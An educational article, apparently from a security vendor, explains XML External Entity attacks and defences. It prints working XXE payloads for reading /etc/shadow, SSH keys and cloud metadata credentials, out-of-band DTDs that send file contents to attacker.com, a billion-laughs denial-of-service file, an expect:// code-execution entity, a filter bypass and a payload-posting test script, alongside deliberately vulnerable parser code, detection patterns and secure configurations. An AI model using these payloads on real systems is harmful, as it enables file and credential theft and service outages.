# XML External Entity (XXE) Attacks

CRITICAL SEVERITY FILE DISCLOSURE XML INJECTION

Imagine filling out a form that asks for your name, but instead of writing "John," you write "Please read the contents of the safe behind you and write it here" - and the clerk actually does it. That's XML External Entity (XXE) in a nutshell.

XXE attacks exploit how computers process XML files. When you upload a specially crafted XML file, the server reads it and unknowingly executes malicious instructions embedded within, like reading sensitive files or making network requests you shouldn't be able to make.

Simple Example: You upload an innocent-looking XML file to a website. Hidden in that file is an instruction that says "Read /etc/passwd file." The server obediently reads the file and includes its contents in the response - giving you access to system files you should never see.

Critical for Legacy Systems

While newer applications use JSON instead of XML, millions of legacy systems still process XML - SOAP APIs, document processors, configuration parsers, and more. XXE remains a critical vulnerability that can lead to file disclosure, server-side request forgery (SSRF), and denial of service.

# What is XXE? (In Simple Terms)

XML (eXtensible Markup Language) is a way to structure data, kind of like HTML. It looks like this:

<person>
    <name>John</name>
    <age>30</age>
</person>

Entities in XML are like variables or shortcuts. You can define them like this:

<!ENTITY company "Acme Corp">
<message>Welcome to &company;</message>

When processed, &company; gets replaced with "Acme Corp".

External Entities can reference files or URLs:

<!ENTITY external SYSTEM "file:///etc/passwd">
<data>&external;</data>

The Vulnerability

If the XML parser is configured to process external entities (which many are by default), it will read the referenced file and include its contents. This is what hackers exploit.

# Real-World Analogies

You're filling out a form at a government office. In the "Name" field, instead of writing your name, you write: "Copy the contents of File #1234 into this field." If the clerk follows instructions blindly, they'll read a confidential file and write it on your form for you to see.

You hand someone a document to copy. Hidden in your document is an instruction: "Go to the filing cabinet, retrieve Document X, and make a copy for this person." If they follow embedded instructions without thinking, they'll give you documents you shouldn't have access to.

Mad Libs asks you to fill in blanks: "The ___ ran to the ___." Normally you write words. But what if you write "contents of my diary" in the blank? If the Mad Libs book could actually fetch and insert your diary contents, that's XXE - using a placeholder to inject external content.

# How XXE Works (The Step-by-Step Story)

Let's see how a typical XXE attack unfolds:

Scenario: Website with XML File Upload

<!-- User uploads normal XML -->
<?xml version="1.0"?>
<order>
    <item>Laptop</item>
    <quantity>1</quantity>
</order>

Server processes it normally and displays: "Order received: 1 Laptop"

<!-- Hacker uploads this -->
<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<order>
    <item>&xxe;</item>
    <quantity>1</quantity>
</order>

Parser sees <!ENTITY xxe SYSTEM "file:///etc/passwd">
Parser defines entity "xxe" that references /etc/passwd
Parser sees &xxe; in the XML
Parser reads /etc/passwd file
Parser replaces &xxe; with file contents

Order received: 1 root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
...

The hacker just read the server's password file!

# Types of XXE Attacks

# 1. Classic XXE (File Disclosure)

FILE ACCESS DATA THEFT

What it is: Reading files from the server's filesystem.

Attack Example:

<?xml version="1.0"?>
<!DOCTYPE data [
  <!ENTITY file SYSTEM "file:///etc/passwd">
]>
<userInfo>
  <firstName>&file;</firstName>
</userInfo>

Files Hackers Target:

[Linux Systems]
<!ENTITY file SYSTEM "file:///etc/passwd">       <!-- User accounts -->
<!ENTITY file SYSTEM "file:///etc/shadow">       <!-- Password hashes -->
<!ENTITY file SYSTEM "file:///etc/hosts">        <!-- Network configuration -->
<!ENTITY file SYSTEM "file:///proc/self/environ"> <!-- Environment variables -->
<!ENTITY file SYSTEM "file:///var/log/apache2/access.log"> <!-- Logs -->
<!ENTITY file SYSTEM "file:///root/.ssh/id_rsa"> <!-- SSH keys -->

[Windows Systems]
<!ENTITY file SYSTEM "file:///C:/Windows/System32/drivers/etc/hosts">
<!ENTITY file SYSTEM "file:///C:/Users/Administrator/.ssh/id_rsa">
<!ENTITY file SYSTEM "file:///C:/inetpub/wwwroot/web.config">

[Application Files]
<!ENTITY file SYSTEM "file:///var/www/html/config.php">  <!-- Database passwords -->
<!ENTITY file SYSTEM "file:///app/secrets.json">         <!-- API keys -->
<!ENTITY file SYSTEM "file:///.env">                     <!-- Environment config -->

Vulnerable Code:

[Python - Vulnerable]
from lxml import etree

xml_data = request.files['upload'].read()

# Default settings allow external entities!
parser = etree.XMLParser()
tree = etree.fromstring(xml_data, parser)

# Attacker can read any file the server can access

[Java - Vulnerable]
// Java - VULNERABLE
DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
// External entities enabled by default!
DocumentBuilder builder = factory.newDocumentBuilder();
Document doc = builder.parse(new InputSource(new StringReader(xmlData)));

[PHP - Vulnerable]
// PHP - VULNERABLE
// libxml_disable_entity_loader is deprecated but still used
libxml_disable_entity_loader(false);  // DANGEROUS!
$xml = simplexml_load_string($xmlData);

STEALTHY OUT-OF-BAND

What it is: The application processes XML but doesn't return the parsed data to you. You need to exfiltrate data out-of-band.

Attack Method - Out-of-Band Exfiltration:

Create file at http://attacker.com/evil.dtd:

<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; exfiltrate SYSTEM 'http://attacker.com/log?data=%file;'>">
%eval;
%exfiltrate;

<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY % xxe SYSTEM "http://attacker.com/evil.dtd">
  %xxe;
]>
<data>test</data>

What happens:

Server parses your XML
Server fetches evil.dtd from your server
evil.dtd reads /etc/passwd
evil.dtd makes HTTP request to attacker.com with file contents in URL

You receive the data in your server logs:

GET /log?data=root:x:0:0:root:/root:/bin/bash... HTTP/1.1

# 3. XXE to SSRF

NETWORK ACCESS INTERNAL SYSTEMS

What it is: Using XXE to make the server send requests to internal systems.

Attack:

<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "http://localhost:8080/admin">
]>
<data>&xxe;</data>

<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/">
]>
<data>&xxe;</data>

SSRF Impact

Same as SSRF - can access internal services, steal cloud credentials, scan internal networks.

# 4. Billion Laughs (XXE DoS)

DENIAL OF SERVICE RESOURCE EXHAUSTION

What it is: Denial of Service through exponential entity expansion.

Attack:

<?xml version="1.0"?>
<!DOCTYPE lolz [
  <!ENTITY lol "lol">
  <!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
  <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
  <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
  <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
  <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
  <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
  <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
  <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>

What Happens:

lol9 expands to 10 lol8's
Each lol8 expands to 10 lol7's
This continues...
Final expansion: 3 billion "lol" strings
Server runs out of memory and crashes

Why "Billion Laughs"

The word "lol" is repeated a billion times, which would be "laughing" a billion times.

# 5. XXE in Different File Formats

HIDDEN XXE

XXE isn't just in .xml files. Many file formats use XML internally:

Create malicious XXE in word/document.xml
Zip it as .docx
Upload to document processor
XXE executes when opened

1. Malicious XML in xl/worksheets/sheet1.xml
2. Same attack as DOCX

<?xml version="1.0" standalone="yes"?>
<!DOCTYPE svg [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<svg width="500" height="500">
  <text x="0" y="16">&xxe;</text>
</svg>

<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <!DOCTYPE foo [
    <!ENTITY xxe SYSTEM "file:///etc/passwd">
  ]>
  <soap:Body>
    <getUserInfo>
      <userId>&xxe;</userId>
    </getUserInfo>
  </soap:Body>
</soap:Envelope>

# Real-World Attack Scenarios

# Scenario 1: Facebook XXE Vulnerability (2014)

$30K BOUNTY RESPONSIBLE DISCLOSURE

The Setup:

Facebook allowed uploading office documents
Documents were processed server-side for preview
DOCX files contain XML

The Attack:

Researcher created DOCX with XXE payload

XXE payload read internal files

Could access:

Internal network configurations
Source code
Configuration files

Impact:

Reported through bug bounty
Facebook paid $30,000 reward
Vulnerability patched quickly

# Scenario 2: Google's XXE in XML Editor

CLIENT-SIDE XXE

The Attack:

Google Toolbar used XML for configuration
XML editor didn't disable external entities

Attack Payload:

<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///c:/boot.ini">
]>
<config>&xxe;</config>

Result:

Could read local files from user's computer
Patched after responsible disclosure

# Scenario 3: IRS E-Filing XXE (2018)

GOVERNMENT SYSTEM TAX DATA

The Setup:

IRS tax filing system accepted XML
Used for business tax returns
Inadequate XXE protection

Potential Attack:

<!-- Tax return XML -->
<!DOCTYPE root [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<TaxReturn>
  <BusinessName>&xxe;</BusinessName>
</TaxReturn>

Impact:

Could have accessed sensitive tax data
Found by security researchers
Government patched before exploitation

# Scenario 4: WordPress Plugin XXE

MASS EXPLOITATION WORDPRESS

:icon-wordpress: The Vulnerability:

Popular WordPress plugin processed XML feeds
RSS/Atom feed parser had XXE vulnerability

Attack:

<!-- Malicious RSS feed -->
<?xml version="1.0"?>
<!DOCTYPE rss [
  <!ENTITY xxe SYSTEM "file:///var/www/html/wp-config.php">
]>
<rss version="2.0">
  <channel>
    <title>&xxe;</title>
  </channel>
</rss>

Result:

Exposed WordPress database credentials
Affected thousands of websites
Emergency patch released

# Advanced XXE Techniques

# 1. PHP Expect Wrapper (Remote Code Execution)

RCE

If PHP's expect module is loaded:

<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "expect://id">
]>
<data>&xxe;</data>

Remote Code Execution

Executes id command on server

ADVANCED

<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY % file SYSTEM "file:///etc/passwd">
  <!ENTITY % dtd SYSTEM "http://attacker.com/evil.dtd">
  %dtd;
  %all;
]>
<foo>&send;</foo>

<!ENTITY % all "<!ENTITY send SYSTEM 'http://attacker.com/?data=%file;'>">

# 3. UTF-7 Encoding Bypass

FILTER EVASION

Some filters check for <!ENTITY but miss encoded versions:

<?xml version="1.0" encoding="UTF-7"?>
+ADw-+ACE-ENTITY xxe SYSTEM +ACI-file:///etc/passwd+ACI +AD4

# 4. XInclude Attacks

ALTERNATIVE METHOD

When you can't control DTD but can control XML content:

<foo xmlns:xi="http://www.w3.org/2001/XInclude">
  <xi:include parse="text" href="file:///etc/passwd"/>
</foo>

# Prevention and Mitigation

# 1. Disable External Entities (Primary Defense)

PRIMARY DEFENSE

[Python (lxml) - Secure]
from lxml import etree

# SECURE: Disable external entities
parser = etree.XMLParser(
    resolve_entities=False,  # Don't resolve entities
    no_network=True,         # No network access
    load_dtd=False           # Don't load DTD
)

xml_data = request.files['upload'].read()
tree = etree.fromstring(xml_data, parser)

[Java - Secure]
import javax.xml.parsers.DocumentBuilderFactory;

DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();

// SECURE: Disable all the things
factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
factory.setFeature("http://xml.org/sax/features/external-general-entities", false);
factory.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
factory.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
factory.setXIncludeAware(false);
factory.setExpandEntityReferences(false);

DocumentBuilder builder = factory.newDocumentBuilder();
Document doc = builder.parse(new InputSource(new StringReader(xmlData)));

[PHP - Secure]
<?php
// SECURE: Disable external entities
libxml_disable_entity_loader(true);

// Even better: use simplexml with LIBXML_NOENT disabled
$xml = simplexml_load_string(
    $xmlData,
    'SimpleXMLElement',
    LIBXML_NOCDATA | LIBXML_NONET
);
?>

[Node.js - Secure]
const libxmljs = require('libxmljs');

// SECURE: Disable external entities
const xml = libxmljs.parseXml(xmlData, {
    noent: false,    // Don't substitute entities
    nonet: true,     // No network access
    dtdload: false,  // Don't load DTD
    dtdvalid: false  // Don't validate against DTD
});

[.NET - Secure]
using System.Xml;

XmlReaderSettings settings = new XmlReaderSettings();

// SECURE: Disable DTD processing
settings.DtdProcessing = DtdProcessing.Prohibit;
settings.XmlResolver = null;

using (XmlReader reader = XmlReader.Create(stream, settings))
{
    XmlDocument doc = new XmlDocument();
    doc.Load(reader);
}

# 2. Use Simple Data Formats

RECOMMENDED

Avoid XML When Possible:

<order>
  <item>Laptop</item>
  <quantity>1</quantity>
</order>

{
  "order": {
    "item": "Laptop",
    "quantity": 1
  }
}

Why JSON is Better

JSON doesn't have entity expansion or DTD processing - no XXE vulnerability!

# 3. Input Validation

DEFENSE IN DEPTH

import re

def validate_xml(xml_string):
    """Check for suspicious XML content"""

    dangerous_patterns = [
        r'<!ENTITY',
        r'<!DOCTYPE',
        r'SYSTEM',
        r'PUBLIC',
        r'file://',
        r'http://',
        r'https://',
        r'expect://',
        r'php://'
    ]

    for pattern in dangerous_patterns:
        if re.search(pattern, xml_string, re.IGNORECASE):
            raise ValueError(f"Suspicious XML content: {pattern}")

    return True

# Usage
xml_data = request.files['upload'].read()
validate_xml(xml_data)  # Throws error if malicious

Important Note

Input validation is defense-in-depth, not primary defense. Always disable external entities!

# 4. Use Modern XML Libraries

RECOMMENDED

Recommended Libraries:

defusedxml - Secure XML library specifically for preventing attacks

import defusedxml.ElementTree as ET

# Automatically prevents XXE, billion laughs, etc.
tree = ET.parse('file.xml')

Use latest versions with secure defaults or consider using JSON instead

fast-xml-parser with safe defaults. Better: use JSON

# 5. Least Privilege

INFRASTRUCTURE

[Create Limited User]
# Run application with limited permissions
# Can't read /etc/passwd if process doesn't have permission

# Create limited user
useradd -r -s /bin/false xmlapp

# Run app as limited user
su -s /bin/sh xmlapp -c 'node server.js'

[File Permissions]
# Application files should not be readable by app user
chmod 640 /app/config/database.yml
chown root:root /app/config/database.yml

# App runs as 'xmlapp' user
# Even if XXE exists, can't read config files

# Testing for XXE Vulnerabilities

# Manual Testing

TESTING GUIDE

File uploads (.xml, .docx, .xlsx, .svg)
API endpoints accepting XML
SOAP web services
RSS/Atom feed parsers
Configuration file uploads

Upload this XML:

<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY test "Hello XXE">
]>
<data>&test;</data>

If response contains "Hello XXE", entities are processed.

<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/hostname">
]>
<data>&xxe;</data>

Check if hostname appears in response.

Set up listener:

nc -lvp 9001

Upload XML:

<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "http://YOUR-IP:9001/test">
]>
<data>&xxe;</data>

If you receive connection, blind XXE exists.

# Automated Tools

[XXEinjector]
# Test for XXE
ruby XXEinjector.rb --host=192.168.1.100 --path=/upload --file=/tmp/test.xml --oob=http --phpfilter

# Enumerate files
ruby XXEinjector.rb --host=target.com --file=request.txt --enumeration

[Burp Suite]
Capture XML request
Send to Intruder
Insert XXE payloads
Analyze responses

[Custom Test Script]
import requests

url = "http://target.com/upload"

# Test payloads
payloads = [
    # Basic entity
    '''<?xml version="1.0"?>
    <!DOCTYPE foo [<!ENTITY test "XXE_WORKS">]>
    <data>&test;</data>''',

    # File disclosure
    '''<?xml version="1.0"?>
    <!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/hostname">]>
    <data>&xxe;</data>''',

    # Out-of-band
    '''<?xml version="1.0"?>
    <!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://attacker.com/xxe">]>
    <data>&xxe;</data>'''
]

for i, payload in enumerate(payloads):
    response = requests.post(url, data=payload, headers={'Content-Type': 'application/xml'})

    print(f"Payload {i+1}:")
    print(f"Status: {response.status_code}")
    print(f"Response: {response.text[:200]}")
    print("-" * 50)

# Summary: What You Need to Remember

XML External Entity (XXE) exploits how XML parsers process external references. By uploading specially crafted XML, attackers can read server files, make internal network requests, or crash the server through resource exhaustion.

The Simple Version:

What it is: Tricking XML parser into reading files or making requests by embedding malicious entity references
Why it's dangerous: Can read sensitive files (passwords, keys), access internal systems (SSRF), or crash servers (DoS)
How to prevent it: Disable external entity processing in XML parsers, use JSON instead of XML

Real-World Impact:

Facebook: Internal file disclosure (2014) - $30K bug bounty
IRS: Tax system vulnerability (2018)
:icon-wordpress: WordPress: Mass exploitation through plugins

Common Targets: Configuration files, password files, SSH keys, source code

# Quick Protection Checklist

For Website Owners & Developers:

DO Disable external entity processing in all XML parsers DO Disable DTD (Document Type Definition) processing DO Use simple data formats (JSON) instead of XML when possible DO Use secure XML libraries (defusedxml, latest versions) DO Run application with least privilege DO Validate and sanitize XML input DO Keep XML processing libraries updated

DON'T Allow external entity resolution in XML parsers DON'T Process untrusted XML with default parser settings DON'T Return raw XML parsing errors to users DON'T Trust office documents (.docx, .xlsx) - they contain XML DON'T Allow DTD declarations in user-supplied XML

For Regular Users:

TIP Be cautious uploading XML files to untrusted sites - they could test for XXE TIP XXE mainly affects servers, not end users directly TIP If you manage systems, audit all XML-processing code

# Additional Resources

Learn More

Layerd AI Guardian Proxy can detect XXE attack patterns in uploaded XML and block malicious entity declarations before they reach your application. Learn more →

Last updated: November 2025

# XML External Entity (XXE) Attacks

Critical for Legacy Systems

# What is XXE? (In Simple Terms)

The Vulnerability

# Real-World Analogies

# How XXE Works (The Step-by-Step Story)

# Types of XXE Attacks

# 1. Classic XXE (File Disclosure)

# 2. Blind XXE (No Direct Output)

# 3. XXE to SSRF

SSRF Impact

# 4. Billion Laughs (XXE DoS)

Why "Billion Laughs"

# 5. XXE in Different File Formats

# Real-World Attack Scenarios

# Scenario 1: Facebook XXE Vulnerability (2014)

# Scenario 2: Google's XXE in XML Editor

# Scenario 3: IRS E-Filing XXE (2018)

# Scenario 4: WordPress Plugin XXE

# Advanced XXE Techniques

# 1. PHP Expect Wrapper (Remote Code Execution)

Remote Code Execution

# 2. Parameter Entities for Blind XXE

# 3. UTF-7 Encoding Bypass

# 4. XInclude Attacks

# Prevention and Mitigation

# 1. Disable External Entities (Primary Defense)

# 2. Use Simple Data Formats

Why JSON is Better

# 3. Input Validation

Important Note

# 4. Use Modern XML Libraries

# 5. Least Privilege

# Testing for XXE Vulnerabilities

# Manual Testing

# Automated Tools

# Summary: What You Need to Remember

# Quick Protection Checklist

# Additional Resources

Learn More